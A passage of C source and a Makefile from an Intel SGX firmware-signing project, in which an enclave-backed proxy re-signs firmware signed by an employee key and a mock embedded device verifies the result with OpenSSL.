# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
######## SGX SDK Settings ########
SGX_SDK ?= /opt/intel/sgxsdk
SGX_MODE ?= HW
SGX_ARCH ?= x64
SGX_DEBUG ?= 1
ifeq ($(shell getconf LONG_BIT), 32)
SGX_ARCH := x86
else ifeq ($(findstring -m32, $(CCFLAGS)), -m32)
SGX_ARCH := x86
endif
ifeq ($(SGX_ARCH), x86)
SGX_COMMON_CFLAGS := -m32
SGX_LIBRARY_PATH := $(SGX_SDK)/lib
SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x86/sgx_sign
SGX_EDGER8R := $(SGX_SDK)/bin/x86/sgx_edger8r
else
SGX_COMMON_CFLAGS := -m64
SGX_LIBRARY_PATH := $(SGX_SDK)/lib64
SGX_ENCLAVE_SIGNER := $(SGX_SDK)/bin/x64/sgx_sign
SGX_EDGER8R := $(SGX_SDK)/bin/x64/sgx_edger8r
endif
ifeq ($(SGX_DEBUG), 1)
ifeq ($(SGX_PRERELEASE), 1)
$(error Cannot set SGX_DEBUG and SGX_PRERELEASE at the same time!!)
endif
endif
ifeq ($(SGX_DEBUG), 1)
SGX_COMMON_CFLAGS += -O0 -g
else
SGX_COMMON_CFLAGS += -O2
endif
######## App Settings ########
ifneq ($(SGX_MODE), HW)
Urts_Library_Name := sgx_urts_sim
else
Urts_Library_Name := sgx_urts
endif
App_C_Files := app/main.c app/proxy.c app/proxysetup.c app/employee.c app/util.c app/embedded_device.c
App_Include_Paths := -IInclude -Iapp -I$(SGX_SDK)/include -I/usr/local/openssl-3.3.1/include
App_C_Flags := $(SGX_COMMON_CFLAGS) -fPIC -Wno-attributes $(App_Include_Paths)
# Three configuration modes - Debug, prerelease, release
# Debug - Macro DEBUG enabled.
# Prerelease - Macro NDEBUG and EDEBUG enabled.
# Release - Macro NDEBUG enabled.
ifeq ($(SGX_DEBUG), 1)
App_C_Flags += -DDEBUG -UNDEBUG -UEDEBUG
else ifeq ($(SGX_PRERELEASE), 1)
App_C_Flags += -DNDEBUG -DEDEBUG -UDEBUG
else
App_C_Flags += -DNDEBUG -UEDEBUG -UDEBUG
endif
OPENSSL := -Wl,-Bstatic -L/usr/local/openssl-3.3.1/lib64 -lssl -lcrypto -Wl,-Bdynamic -ldl
App_Link_Flags := $(SGX_COMMON_CFLAGS) -L$(SGX_LIBRARY_PATH) -l$(Urts_Library_Name) -lpthread -lsgx_urts $(OPENSSL)
ifneq ($(SGX_MODE), HW)
App_Link_Flags += -lsgx_uae_service_sim
else
App_Link_Flags += -lsgx_uae_service
endif
App_C_Objects := $(App_C_Files:.c=.o)
App_Name := signatureproxy
######## Enclave Settings ########
ifneq ($(SGX_MODE), HW)
Trts_Library_Name := sgx_trts_sim
Service_Library_Name := sgx_tservice_sim
else
Trts_Library_Name := sgx_trts
Service_Library_Name := sgx_tservice
endif
Crypto_Library_Name := sgx_tcrypto
Enclave_C_Files := enclave/enclave.c
Enclave_Include_Paths := -IInclude -Ienclave -I$(SGX_SDK)/include -I$(SGX_SDK)/include/tlibc -I$(SGX_SDK)/include/libcxx
CC_BELOW_4_9 := $(shell expr "`$(CC) -dumpversion`" \< "4.9")
ifeq ($(CC_BELOW_4_9), 1)
Enclave_C_Flags := $(SGX_COMMON_CFLAGS) -nostdinc -fvisibility=hidden -fpie -ffunction-sections -fdata-sections -fstack-protector
else
Enclave_C_Flags := $(SGX_COMMON_CFLAGS) -nostdinc -fvisibility=hidden -fpie -ffunction-sections -fdata-sections -fstack-protector-strong
endif
Enclave_C_Flags += $(Enclave_Include_Paths)
# To generate a proper enclave, it is recommended to follow below guideline to link the trusted libraries:
# 1. Link sgx_trts with the `--whole-archive' and `--no-whole-archive' options,
# so that the whole content of trts is included in the enclave.
# 2. For other libraries, you just need to pull the required symbols.
# Use `--start-group' and `--end-group' to link these libraries.
# Do NOT move the libraries linked with `--start-group' and `--end-group' within `--whole-archive' and `--no-whole-archive' options.
# Otherwise, you may get some undesirable errors.
Enclave_Link_Flags := $(SGX_COMMON_CFLAGS) -Wl,--no-undefined -nostdlib -nodefaultlibs -nostartfiles -L$(SGX_LIBRARY_PATH) \
-Wl,--whole-archive -l$(Trts_Library_Name) -Wl,--no-whole-archive \
-Wl,--start-group -lsgx_tstdc -lsgx_tcxx -l$(Crypto_Library_Name) -l$(Service_Library_Name) -Wl,--end-group \
-Wl,-Bstatic -Wl,-Bsymbolic -Wl,--no-undefined \
-Wl,-pie,-eenclave_entry -Wl,--export-dynamic \
-Wl,--defsym,__ImageBase=0 -Wl,--gc-sections \
-Wl,--version-script=enclave/enclave.lds \
Enclave_C_Objects := $(Enclave_C_Files:.c=.o)
Enclave_Name := enclave.so
Signed_Enclave_Name := enclave.signed.so
Enclave_Config_File := enclave/enclave.config.xml
ifeq ($(SGX_MODE), HW)
ifeq ($(SGX_DEBUG), 1)
Build_Mode = HW_DEBUG
else ifeq ($(SGX_PRERELEASE), 1)
Build_Mode = HW_PRERELEASE
else
Build_Mode = HW_RELEASE
endif
else
ifeq ($(SGX_DEBUG), 1)
Build_Mode = SIM_DEBUG
else ifeq ($(SGX_PRERELEASE), 1)
Build_Mode = SIM_PRERELEASE
else
Build_Mode = SIM_RELEASE
endif
endif
.PHONY: all run
ifeq ($(Build_Mode), HW_RELEASE)
all: .config_$(Build_Mode)_$(SGX_ARCH) $(App_Name) $(Enclave_Name)
@echo "The project has been built in release hardware mode."
@echo "Please sign the $(Enclave_Name) first with your signing key before you run the $(App_Name) to launch and access the enclave."
@echo "To sign the enclave use the command:"
@echo " $(SGX_ENCLAVE_SIGNER) sign -key <your key> -enclave $(Enclave_Name) -out <$(Signed_Enclave_Name)> -config $(Enclave_Config_File)"
@echo "You can also sign the enclave using an external signing tool."
@echo "To build the project in simulation mode set SGX_MODE=SIM. To build the project in prerelease mode set SGX_PRERELEASE=1 and SGX_MODE=HW."
else
all: .config_$(Build_Mode)_$(SGX_ARCH) $(App_Name) $(Signed_Enclave_Name)
ifeq ($(Build_Mode), HW_DEBUG)
@echo "The project has been built in debug hardware mode."
else ifeq ($(Build_Mode), SIM_DEBUG)
@echo "The project has been built in debug simulation mode."
else ifeq ($(Build_Mode), HW_PRERELEASE)
@echo "The project has been built in pre-release hardware mode."
else ifeq ($(Build_Mode), SIM_PRERELEASE)
@echo "The project has been built in pre-release simulation mode."
else
@echo "The project has been built in release simulation mode."
endif
endif
run: all
ifneq ($(Build_Mode), HW_RELEASE)
@$(CURDIR)/$(App_Name)
@echo "RUN => $(App_Name) [$(SGX_MODE)|$(SGX_ARCH), OK]"
endif
######## App Objects ########
app/enclave_u.c: $(SGX_EDGER8R) enclave/enclave.edl
@cd app && $(SGX_EDGER8R) --untrusted ../enclave/enclave.edl --search-path ../enclave --search-path $(SGX_SDK)/include
@echo "GEN => $@"
app/enclave_u.o: app/enclave_u.c
@$(CC) $(App_C_Flags) -c $< -o $@
@echo "CC <= $<"
app/%.o: app/%.c
@$(CC) $(App_C_Flags) -c $< -o $@
@echo "CC <= $<"
$(App_Name): app/enclave_u.o $(App_C_Objects)
@$(CC) $^ -o $@ $(App_Link_Flags)
@echo "LINK => $@"
.config_$(Build_Mode)_$(SGX_ARCH):
@rm -f .config_* $(App_Name) $(Enclave_Name) $(Signed_Enclave_Name) $(App_C_Objects) app/enclave_u.* $(Enclave_C_Objects) enclave/enclave_t.*
@touch .config_$(Build_Mode)_$(SGX_ARCH)
######## Enclave Objects ########
enclave/enclave_t.c: $(SGX_EDGER8R) enclave/enclave.edl
@cd enclave && $(SGX_EDGER8R) --trusted ../enclave/enclave.edl --search-path ../enclave --search-path $(SGX_SDK)/include
@echo "GEN => $@"
enclave/enclave_t.o: enclave/enclave_t.c
@$(CC) $(Enclave_C_Flags) -c $< -o $@
@echo "CC <= $<"
enclave/%.o: enclave/%.c
@$(CC) $(Enclave_C_Flags) -c $< -o $@
@echo "CC <= $<"
$(Enclave_Name): enclave/enclave_t.o $(Enclave_C_Objects)
@$(CC) $^ -o $@ $(Enclave_Link_Flags)
@echo "LINK => $@"
$(Signed_Enclave_Name): $(Enclave_Name)
@$(SGX_ENCLAVE_SIGNER) sign -key enclave/enclave_private.pem -enclave $(Enclave_Name) -out $@ -config $(Enclave_Config_File)
@echo "SIGN => $@"
.PHONY: clean
clean:
@rm -f .config_* $(App_Name) $(Enclave_Name) $(Signed_Enclave_Name) $(App_C_Objects) app/enclave_u.* $(Enclave_C_Objects) enclave/enclave_t.*

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@ -0,0 +1,143 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "util.h"
#include <openssl/sha.h>
#include <openssl/ec.h>
#include <openssl/bn.h>
#include <openssl/err.h>
#include <openssl/evp.h>
#include <openssl/pem.h>
#include <openssl/core_names.h>
#include "embedded_device.h"
#define BUFSIZE 16384
typedef struct {
uint8_t *firmware_path;
uint8_t *public_key_path;
} embedded_device_args;
char *embedded_device_syntax(void) {
return
"embedded mock up implementation of a embedded device\n"
" -ppub <path> file path of the PEM encoded public key of the proxy\n"
" -firm <path> path of to firmware binary\n";
}
/*
* read secp256r1 public key and return it as EVP_PKEY*
*/
static EVP_PKEY *read_public_key(char *public_key_file_path, EVP_PKEY **key) {
if(public_key_file_path == NULL) {
fprintf(stderr, "public_key_file_path is a null pointer!\n");
return NULL;
}
FILE *fd = fopen(public_key_file_path, "rb");
if(fd == NULL) {
fprintf(stderr, "failed to open public key file!\n");
return NULL;
}
*key = PEM_read_PUBKEY(fd, key, NULL, NULL);
fclose(fd);
return *key;
}
/*
* hash the firmware
*/
static void hash_firmware(uint8_t *firmware_path, EVP_MD_CTX **ctx) {
if(firmware_path == NULL) {
fprintf(stderr, "firmware_path is a null pointer!\n");
return;
}
FILE *fd = fopen(firmware_path, "rb");
if(fd == NULL) {
fprintf(stderr, "failed to open firmware!\n");
goto exit;
}
size_t size;
uint8_t buf[BUFSIZE];
while((size = fread(buf, 1, BUFSIZE, fd)) != 0) {
EVP_DigestVerifyUpdate(*ctx, buf, size);
}
exit: fclose(fd);
}
int handle_embedded_device(int argc, char **argv) {
uint8_t status = EXIT_SUCCESS;
embedded_device_args args = {
.firmware_path = NULL,
.public_key_path = NULL
};
// parse parameters
for(int i = 0; i < argc; i += 2) {
if((strcmp(argv[i], "-ppub") == 0) && (argc - i >= 2)) {
args.public_key_path = argv[i+1];
} else if((strcmp(argv[i], "-firm") == 0) && (argc - i >= 2)) {
args.firmware_path = argv[i+1];
} else {
syntax_exit();
}
}
// handle invalid parameters
if((args.firmware_path == NULL) || (args.public_key_path == NULL)) {
fprintf(stderr, "failed to parse arguments");
exit(EXIT_FAILURE);
}
// read the public key of the enclave
// normally, key would be hardcoded during production
EVP_PKEY *key = NULL;
if(read_public_key(args.public_key_path, &key) == NULL) {
fprintf(stderr, "failed to import public key");
status = EXIT_FAILURE;
goto clean;
}
// initialize the context
EVP_MD_CTX *ctx = EVP_MD_CTX_new();
if (EVP_DigestVerifyInit(ctx, NULL, EVP_sha256(), NULL, key) != 1) {
fprintf(stderr, "failed to initialize context\n");
status = EXIT_FAILURE;
goto clean;
}
// read the firmwares signature
uint8_t signature[BUFSIZE] = {0};
size_t signature_size = read(0, signature, BUFSIZE);
if(signature_size < 70) {
fprintf(stderr, "failed to read firmware signature\n");
status = EXIT_FAILURE;
goto clean;
}
// hash the firmware and verify the signature
hash_firmware(args.firmware_path, &ctx);
if (EVP_DigestVerifyFinal(ctx, signature, signature_size) != 1) {
fprintf(stderr, "failed to verify firmware signature or signature invalid\n");
status = EXIT_FAILURE;
}else {
printf("Firmware is valid! Update starts in 5 4 3...\n");
}
// cleanup
clean: ;
if(key != NULL)
EVP_PKEY_free(key);
if(ctx != NULL)
EVP_MD_CTX_free(ctx);
return status;
}

View file

@ -0,0 +1,23 @@
#ifndef EMBEDDED_DEVICE_H
#define EMBEDDED_DEVICE_H
#include <stdint.h>
/*
* @brief getter for embedded subcommand syntax string
*
* @returns null-terminated syntax string
*/
char *embedded_device_syntax(void);
/*
* @brief CLI implementation for the "embedded" subcommand
*
* @param argc number of arguments with command and subcommand stripped
* @param argv arguments with command and subcommand stripped
*
* @returns 0 on success, else error with output on stderr
*/
int handle_embedded_device(int argc, char **argv);
#endif

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@ -0,0 +1,135 @@
#include <errno.h>
#include <sgx_urts.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "employee.h"
#include "util.h"
#include <openssl/core_names.h>
#include <openssl/evp.h>
#include <openssl/pem.h>
#define HASH_BYTES 32
#define HASH_CHUNK_BYTES 32
#define KEY_BYTES 32
struct EmployeeArgs {
char* key_path;
char* firmware_path;
};
char* employee_syntax(void) {
return
"employee mock up implementation of the employee binary\n"
" outputs signature on stdout\n"
" WARNING: output is in binary format, may mess up terminal\n"
" -ekey <path> file path of the PEM encoded private key of the employee\n"
" -firm <path> path of the firmware\n";
}
int handle_employee(int argc, char** argv) {
struct EmployeeArgs args = {
NULL,
NULL
};
FILE* key_file = NULL;
uint8_t* firmware_buf;
size_t firmware_len;
EVP_PKEY* key = NULL;
EVP_MD_CTX *mdctx = NULL;
size_t sig_len;
unsigned char* sig = NULL;
/*
* Parse Input
*/
int i = 0;
while(i < argc) {
if(strcmp(argv[i], "-ekey")==0 && argc-i >=2){
args.key_path = argv[i+1];
i += 2;
}else if(strcmp(argv[i], "-firm")==0 && argc-i >=2){
args.firmware_path = argv[i+1];
i += 2;
}else
syntax_exit();
}
if(args.key_path == NULL)
syntax_exit();
/*
* Load Signing Key
*/
key_file = fopen(args.key_path, "rb");
if(key_file == NULL){
perror("Error opening key file");
exit (EXIT_FAILURE);
}
key = PEM_read_PrivateKey(key_file, &key, NULL, NULL);
if(key == NULL) {
fprintf(stderr, "failed to read key\n");
exit (EXIT_FAILURE);
}
fclose(key_file);
/*
* Sign Firmware
*/
mdctx = EVP_MD_CTX_new();
if (EVP_DigestSignInit(mdctx, NULL, EVP_sha256(), NULL, key) != 1) {
fprintf(stderr, "Message digest initialization failed.\n");
exit (EXIT_FAILURE);
}
if (load_file(args.firmware_path, &firmware_buf, &firmware_len) != 0) {
fprintf(stderr, "failed to read firmware\n");
exit (EXIT_FAILURE);
}
if (EVP_DigestSignUpdate(mdctx, firmware_buf, firmware_len) != 1) {
printf("Message digest update failed.\n");
exit(EXIT_FAILURE);
}
free(firmware_buf);
// call with empty sig to get length
if (EVP_DigestSignFinal(mdctx, NULL, &sig_len) != 1) {
printf("Message digest finalization failed.\n");
exit (EXIT_FAILURE);
}
// allocate signature buffer
sig = malloc(sizeof(unsigned char) * sig_len);
if(sig == NULL){
perror("could not initialize digest buffer");
exit (EXIT_FAILURE);
}
// load signature into buffer
if (EVP_DigestSignFinal(mdctx, sig, &sig_len) != 1) {
printf("Message digest finalization failed.\n");
exit (EXIT_FAILURE);
}
fwrite(sig, sig_len, 1, stdout);
if (ferror(stdout) != 0) {
fprintf(stdout, "failed to write signature to stdout\n");
exit (EXIT_FAILURE);
}
fflush(stdout);
// free all allocated resources
free(sig);
EVP_MD_CTX_free(mdctx);
EVP_PKEY_free(key);
exit (EXIT_SUCCESS);
}

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#ifndef _APP_INTERMEDIARY_H_
#define _APP_INTERMEDIARY_H_
/*
* @brief getter for employee subcommand syntax string
*
* @returns null-terminated syntax string
*/
char* employee_syntax(void);
/*
* @brief CLI implementation for the "employee" subcommand
*
* @param argc number of arguments with command and subcommand stripped
* @param argv arguments with command and subcommand stripped
*
* @returns 0 on success, else error with output on stderr
*/
int handle_employee(int argc, char** argv);
#endif

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#include <errno.h>
#include <string.h>
#include "embedded_device.h"
#include "employee.h"
#include "proxy.h"
#include "proxysetup.h"
#include "util.h"
/*
* main method of the binary calls the implementation of the specified subcommand
*/
int main(int argc, char** argv) {
if(argc < 1)
syntax_exit();
set_bin_name(argv[0]);
if(argc < 2)
syntax_exit();
char* command = argv[1];
if(strcmp(command, "employee")==0)
handle_employee(argc-2, argv+2);
else if (strcmp(command, "proxy")==0)
handle_proxy(argc-2, argv+2);
else if (strcmp(command, "proxysetup")==0)
handle_proxysetup(argc-2, argv+2);
else if (strcmp(command, "embedded")==0)
handle_embedded_device(argc-2, argv+2);
else
syntax_exit();
}

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#include <errno.h>
#include <sgx_urts.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/core_names.h>
#include <openssl/evp.h>
#include <openssl/param_build.h>
#include <openssl/pem.h>
#include <sgx_tcrypto.h>
#include "enclave_u.h"
#include "proxy.h"
#include "util.h"
struct ProxyArgs {
char* sealed_key_file_path;
char* sgx_token_path;
char* employee_public_key_path;
char* firmware_path;
};
char* proxy_syntax(void) {
return
"proxy implementation of the enclave-powered SignatureProxy\n"
" expects intermediary signature on stdin\n"
" outputs proxied signature on stdout\n"
" WARNING: output is binary format, may mess up terminal\n"
" -pkey <path> file path of the sealed proxy key\n"
" -epub <path> path of the PEM encoded employee public key\n"
" -firm <path> path of the firmware\n"
" -token <path> (optional) file path of the sgx token\n";
}
static EVP_PKEY *sgx_public_to_EVP_PKEY(const sgx_ec256_public_t *p_public)
{
EVP_PKEY *evp_key = NULL;
EVP_PKEY_CTX *pkey_ctx = NULL;
BIGNUM *bn_pub_x = NULL;
BIGNUM *bn_pub_y = NULL;
EC_POINT *point = NULL;
EC_GROUP* group = NULL;
OSSL_PARAM_BLD *params_build = NULL;
OSSL_PARAM *params = NULL;
const char *curvename = NULL;
int nid = 0;
size_t key_len;
unsigned char pub_key[SGX_ECP256_KEY_SIZE+4];
group = EC_GROUP_new_by_curve_name(NID_X9_62_prime256v1);
if (group == NULL)
return NULL;
do {
// converts the x value of public key, represented as positive integer in little-endian into a BIGNUM
bn_pub_x = BN_lebin2bn((unsigned char*)p_public->gx, sizeof(p_public->gx), bn_pub_x);
if (NULL == bn_pub_x) {
break;
}
// converts the y value of public key, represented as positive integer in little-endian into a BIGNUM
bn_pub_y = BN_lebin2bn((unsigned char*)p_public->gy, sizeof(p_public->gy), bn_pub_y);
if (NULL == bn_pub_y) {
break;
}
// creates new point and assigned the group object that the point relates to
point = EC_POINT_new(group);
if (NULL == point) {
break;
}
// sets point based on public key's x,y coordinates
if (1 != EC_POINT_set_affine_coordinates(group, point, bn_pub_x, bn_pub_y, NULL)) {
break;
}
// check point if the point is on curve
if (1 != EC_POINT_is_on_curve(group, point, NULL)) {
break;
}
// convert point to octet string
key_len = EC_POINT_point2oct(group, point, POINT_CONVERSION_COMPRESSED, pub_key, sizeof(pub_key), NULL);
if (key_len == 0) {
break;
}
// build OSSL_PARAM
params_build = OSSL_PARAM_BLD_new();
if (NULL == params_build) {
break;
}
nid = EC_GROUP_get_curve_name(group);
if (nid == NID_undef) {
break;
}
curvename = OBJ_nid2sn(nid);
if (curvename == NULL) {
break;
}
if (1 != OSSL_PARAM_BLD_push_utf8_string(params_build, "group", curvename, 0)) {
break;
}
if (1 != OSSL_PARAM_BLD_push_octet_string(params_build, OSSL_PKEY_PARAM_PUB_KEY, pub_key, key_len)) {
break;
}
params = OSSL_PARAM_BLD_to_param(params_build);
if (NULL == params) {
break;
}
// get pkey from params
pkey_ctx = EVP_PKEY_CTX_new_from_name(NULL, "EC", NULL);
if (NULL == pkey_ctx) {
break;
}
if (1 != EVP_PKEY_fromdata_init(pkey_ctx)) {
break;
}
if (1 != EVP_PKEY_fromdata(pkey_ctx, &evp_key, EVP_PKEY_PUBLIC_KEY, params)) {
EVP_PKEY_free(evp_key);
evp_key = NULL;
}
} while(0);
BN_clear_free(bn_pub_x);
BN_clear_free(bn_pub_y);
EC_POINT_clear_free(point);
OSSL_PARAM_free(params);
OSSL_PARAM_BLD_free(params_build);
EVP_PKEY_CTX_free(pkey_ctx);
EC_GROUP_free(group);
return evp_key;
}
static int EVP_PKEY_to_sgx_public(EVP_PKEY* ecdsa_key, sgx_ec256_public_t* sgx_public) {
EC_GROUP* group = NULL;
EC_POINT *point = NULL;
BIGNUM* pub_x = NULL;
BIGNUM* pub_y = NULL;
size_t ec_key_buf_len = 0;
unsigned char ec_key_buf[1024];
int ret;
int retval;
group = EC_GROUP_new_by_curve_name(NID_X9_62_prime256v1);
if (group == NULL)
return 1;
point = EC_POINT_new(group);
if (point == NULL)
return 2;
ret = EVP_PKEY_get_octet_string_param(ecdsa_key, OSSL_PKEY_PARAM_PUB_KEY, ec_key_buf, 1024, &ec_key_buf_len);
if (ret != 1)
return 3;
ret = EC_POINT_oct2point(group, point, ec_key_buf, ec_key_buf_len, NULL);
if (ret != 1){
retval = 4;
goto cleanup;
}
pub_x = BN_new();
pub_y = BN_new();
ret = EC_POINT_get_affine_coordinates(group, point, pub_x, pub_y, NULL);
if (ret != 1){
retval = 5;
goto cleanup;
}
ret = BN_bn2lebinpad(pub_x, sgx_public->gx, SGX_ECP256_KEY_SIZE);
if (ret == -1){
retval = 6;
goto cleanup;
}
ret = BN_bn2lebinpad(pub_y, sgx_public->gy, SGX_ECP256_KEY_SIZE);
if (ret == -1){
retval = 7;
goto cleanup;
}
retval = 0;
cleanup:
if (pub_x != NULL)
BN_clear_free(pub_x);
if (pub_y != NULL)
BN_clear_free(pub_y);
if (point != NULL)
EC_POINT_clear_free(point);
if (group != NULL)
EC_GROUP_free(group);
return (retval);
}
static int ECDSA_SIG_to_sgx_signature(ECDSA_SIG* ecdsa_sig, sgx_ec256_signature_t* sgx_signature) {
const BIGNUM* r = NULL;
const BIGNUM* s = NULL;
int ret;
r = ECDSA_SIG_get0_r(ecdsa_sig);
s = ECDSA_SIG_get0_s(ecdsa_sig);
ret = BN_bn2lebinpad(r, (unsigned char*)sgx_signature->x, SGX_ECP256_KEY_SIZE);
if (ret == -1)
return (1);
ret = BN_bn2lebinpad(s, (unsigned char*)sgx_signature->y, SGX_ECP256_KEY_SIZE);
if (ret == -1)
return (2);
return (0);
}
/*
* This function is a modified version of the `sgx_ecdsa_verify_hash` function in the [Intel SGX crypto library](https://github.com/intel/linux-sgx/blob/main/sdk/tlibcrypto/sgxssl/sgx_ecc256_ecdsa.cpp).
* The specified License applies.
*/
static int sgx_signature_to_ECDSA_SIG(sgx_ec256_signature_t* sgx_signature, ECDSA_SIG** ecdsa_signature) {
BIGNUM *bn_r = NULL;
BIGNUM *bn_s = NULL;
// converts the x value of the signature, represented as positive integer in little-endian into a BIGNUM
//
bn_r = BN_lebin2bn((unsigned char*)sgx_signature->x, sizeof(sgx_signature->x), 0);
if (bn_r == NULL)
return (1);
// converts the y value of the signature, represented as positive integer in little-endian into a BIGNUM
//
bn_s = BN_lebin2bn((unsigned char*)sgx_signature->y, sizeof(sgx_signature->y), 0);
if (NULL == bn_s) {
if (bn_r != NULL)
BN_clear_free(bn_r);
return (2);
}
// allocates a new ECDSA_SIG structure (note: this function also allocates the BIGNUMs) and initialize it
//
*ecdsa_signature = ECDSA_SIG_new();
if (NULL == *ecdsa_signature) {
if (bn_r != NULL)
BN_clear_free(bn_r);
if (bn_s != NULL)
BN_clear_free(bn_s);
return (3);
}
// setes the r and s values of ecdsa_sig
// calling this function transfers the memory management of the values to the ECDSA_SIG object,
// and therefore the values that have been passed in should not be freed directly after this function has been called
//
if (1 != ECDSA_SIG_set0(*ecdsa_signature, bn_r, bn_s)) {
ECDSA_SIG_free(*ecdsa_signature);
*ecdsa_signature = NULL;
if (bn_r != NULL)
BN_clear_free(bn_r);
if (bn_s != NULL)
BN_clear_free(bn_s);
return (4);
}
return (0);
}
int handle_proxy(int argc, char** argv) {
struct ProxyArgs args = {
NULL,
NULL,
NULL
};
uint8_t* sealed;
size_t sealed_len;
uint8_t* firmware;
size_t firmware_len;
unsigned char* ecdsa_signature_data;
size_t ecdsa_signature_size = 0;
uint8_t signature[70];
sgx_status_t ret;
ECDSA_SIG* ecdsa_signature;
sgx_ec256_signature_t sgx_signature;
/*
* Parse Input
*/
int i = 0;
while(i < argc) {
if(strcmp(argv[i], "-pkey")==0 && argc-i >=2){
args.sealed_key_file_path = argv[i+1];
i += 2;
}else if(strcmp(argv[i], "-token")==0 && argc-i >=2){
args.sgx_token_path = argv[i+1];
i += 2;
}else if(strcmp(argv[i], "-epub")==0 && argc-i >=2){
args.employee_public_key_path = argv[i+1];
i += 2;
}else if(strcmp(argv[i], "-firm")==0 && argc-i >=2){
args.firmware_path = argv[i+1];
i += 2;
}else
syntax_exit();
}
if(args.sealed_key_file_path == NULL || args.employee_public_key_path == NULL || args.firmware_path == NULL)
syntax_exit();
/*
* Read And Parse Signature Input
*/
ecdsa_signature_data = malloc(1024);
if (ecdsa_signature_data == NULL) {
perror("failed to allocate signature");
exit (EXIT_FAILURE);
}
ecdsa_signature_size = fread(ecdsa_signature_data, 1, 1024, stdin);
if (ferror(stdin) != 0) {
fprintf(stderr, "failed to read signature from stdin\n");
exit (EXIT_FAILURE);
}
ecdsa_signature = ECDSA_SIG_new();
ecdsa_signature = d2i_ECDSA_SIG(&ecdsa_signature, (const unsigned char**)&ecdsa_signature_data, ecdsa_signature_size);
ecdsa_signature_data = NULL;
if (ecdsa_signature == NULL) {
fprintf(stderr, "failed to read signature\n");
exit (EXIT_FAILURE);
}
if (ECDSA_SIG_to_sgx_signature(ecdsa_signature, &sgx_signature) != 0) {
fprintf(stderr, "failed to transform signature\n");
exit (EXIT_FAILURE);
}
ECDSA_SIG_free(ecdsa_signature);
ecdsa_signature = NULL;
// Initialize SGX Enclave
if (initialize_enclave(args.sgx_token_path) != 0)
exit(1);
/*
* Read Employee Public Key
*/
EVP_PKEY* key = NULL;
FILE* key_file = fopen(args.employee_public_key_path, "rb");
if(key_file == NULL){
perror("Error opening employee public key file");
exit(1);
}
key = PEM_read_PUBKEY(key_file, &key, NULL, NULL);
if(key == NULL) {
fprintf(stderr, "failed to read employee public key\n");
exit (EXIT_FAILURE);
}
fclose(key_file);
sgx_ec256_public_t sgx_public;
if (EVP_PKEY_to_sgx_public(key, &sgx_public) != 0) {
fprintf(stderr, "failed transform employee public key\n");
exit (EXIT_FAILURE);
}
//Read Sealed Proxy Keypair
if (load_file(args.sealed_key_file_path, &sealed, &sealed_len)!=0){
fprintf(stderr, "failed to read sealed key\n");
exit (EXIT_FAILURE);
}
// Read Firmware
if (load_file(args.firmware_path, &firmware, &firmware_len)!=0){
fprintf(stderr, "failed to read firmware\n");
exit (EXIT_FAILURE);
}
/*
* Use Enclave To Resign the Firmware
*/
sign_firmware(get_global_eid(), &ret, firmware, firmware_len, sealed, sealed_len, (uint8_t*)&sgx_public, (uint8_t*)&sgx_signature);
if (ret != SGX_SUCCESS) {
sgx_print_error_message(ret);
exit (1);
}
free(sealed);
free(firmware);
/*
* Output Signature
*/
if (sgx_signature_to_ECDSA_SIG(&sgx_signature, &ecdsa_signature) != 0) {
fprintf(stderr, "could not convert signature\n");
exit (EXIT_FAILURE);
}
ecdsa_signature_data = NULL;
ecdsa_signature_size = i2d_ECDSA_SIG(ecdsa_signature, &ecdsa_signature_data);
if (ecdsa_signature_size <= 0) {
fprintf(stderr, "could not convert signature\n");
exit (EXIT_FAILURE);
}
fwrite(ecdsa_signature_data, ecdsa_signature_size, 1, stdout);
if (ferror(stdout) != 0) {
fprintf(stderr, "could not write signature to stdout\n");
exit (EXIT_FAILURE);
}
fflush(stdout);
free(ecdsa_signature_data);
ECDSA_SIG_free(ecdsa_signature);
exit (EXIT_SUCCESS);
}

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#ifndef _APP_PROXY_H_
#define _APP_PROXY_H_
/*
* @brief getter for proxy subcommand syntax string
*
* @returns null-terminated syntax string
*/
char* proxy_syntax(void);
/*
* @brief CLI implementation for the "proxy" subcommand
*
* @param argc number of arguments with command and subcommand stripped
* @param argv arguments with command and subcommand stripped
*
* @returns 0 on success, else error with output on stderr
*/
int handle_proxy(int argc, char** argv);
#endif

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#include <errno.h>
#include <sgx_urts.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <openssl/core_names.h>
#include <openssl/evp.h>
#include <openssl/param_build.h>
#include <openssl/pem.h>
#include <sgx_tcrypto.h>
#include "enclave_u.h"
#include "proxysetup.h"
#include "util.h"
struct ProxysetupArgs {
char* sealed_key_file_path;
char* sgx_token_path;
};
char* proxysetup_syntax(void) {
return
"proxysetup implementation of the enclave-powered SignatureProxy\n"
" outputs public key on stdout\n"
" -pkey <path> file path of the sealed proxy key\n"
" -token <path> (optional) file path of the sgx token\n";
}
/*
* This function is a modified version of the `get_pub_key_from_coords` function in the [Intel SGX crypto library](https://github.com/intel/linux-sgx/blob/c1ceb4fe146e0feb1097dee81c7e89925443e43c/sdk/tlibcrypto/sgxssl/sgx_ecc256.cpp).
* The specified License applies.
